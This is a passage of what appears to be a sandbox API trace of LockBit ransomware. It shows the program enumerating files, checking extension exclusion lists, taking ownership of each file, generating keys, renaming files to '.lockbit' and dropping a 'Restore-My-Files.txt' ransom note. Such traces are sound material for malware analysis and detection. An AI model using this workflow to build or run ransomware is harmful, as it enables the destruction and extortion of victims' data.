[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.662] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.663] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.663] CloseHandle (hObject=0x3c4) returned 1 [0080.663] free (_Block=0x77d800) [0080.663] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0080.663] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.663] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.663] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5088) returned 1 [0080.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.665] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.665] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.673] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.673] malloc (_Size=0xca) returned 0x77d800 [0080.673] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xca, FileInformationClass=0xa) returned 0x0 [0080.674] free (_Block=0x77d800) [0080.674] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.674] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.674] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.674] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1bf7c2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f1bf7c2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0080.674] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0080.674] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0080.674] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0080.674] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.674] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.674] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.674] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.674] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.674] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.674] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.674] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.674] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.674] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.674] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.675] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.675] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.675] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.675] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.675] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.675] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.675] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.675] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.676] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.676] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.676] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0080.676] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0080.676] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0080.676] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0080.676] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0080.676] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0080.676] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0080.676] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.676] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0080.676] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.676] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.676] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.676] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.677] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.677] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.677] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.677] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.677] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.677] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.677] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.677] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.677] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.677] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.677] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.677] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.677] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.677] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.677] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.677] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.677] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.677] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.677] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 96 [0080.677] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.700] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.700] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.700] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.701] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.701] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.701] RtlFreeAnsiString (AnsiString="\\") [0080.701] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0080.701] malloc (_Size=0x200) returned 0x77d800 [0080.701] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.701] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.701] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.701] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.702] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.702] CloseHandle (hObject=0x3a0) returned 1 [0080.702] free (_Block=0x77d800) [0080.702] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0080.702] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.703] malloc (_Size=0x40068) returned 0x1ff1e60 [0080.703] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3130) returned 1 [0080.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0080.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0080.704] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.707] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.707] malloc (_Size=0xd6) returned 0x77d800 [0080.707] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd6, FileInformationClass=0xa) returned 0x0 [0080.708] free (_Block=0x77d800) [0080.708] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.708] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.708] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.708] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1e591f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f1e591f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0080.708] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0080.708] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0080.708] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0080.708] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.708] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.709] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.709] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.709] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.709] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.710] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.710] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.710] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.710] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.710] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.710] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.710] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.710] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.710] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0080.710] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0080.710] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0080.710] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0080.710] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0080.710] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0080.710] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0080.711] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.711] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png") returned=".png" [0080.711] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.711] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.711] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.711] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.712] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.712] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.712] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.712] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.712] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.712] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.712] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.712] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.712] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png.lockbit") returned 91 [0080.712] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.719] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.720] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.720] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.720] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.720] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.720] RtlFreeAnsiString (AnsiString="\\") [0080.720] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0080.720] malloc (_Size=0x200) returned 0x77d800 [0080.721] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.721] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.721] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.721] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.721] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.721] CloseHandle (hObject=0x3c0) returned 1 [0080.722] free (_Block=0x77d800) [0080.722] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0080.722] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.722] malloc (_Size=0x40068) returned 0x3d70048 [0080.722] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=5025) returned 1 [0080.722] 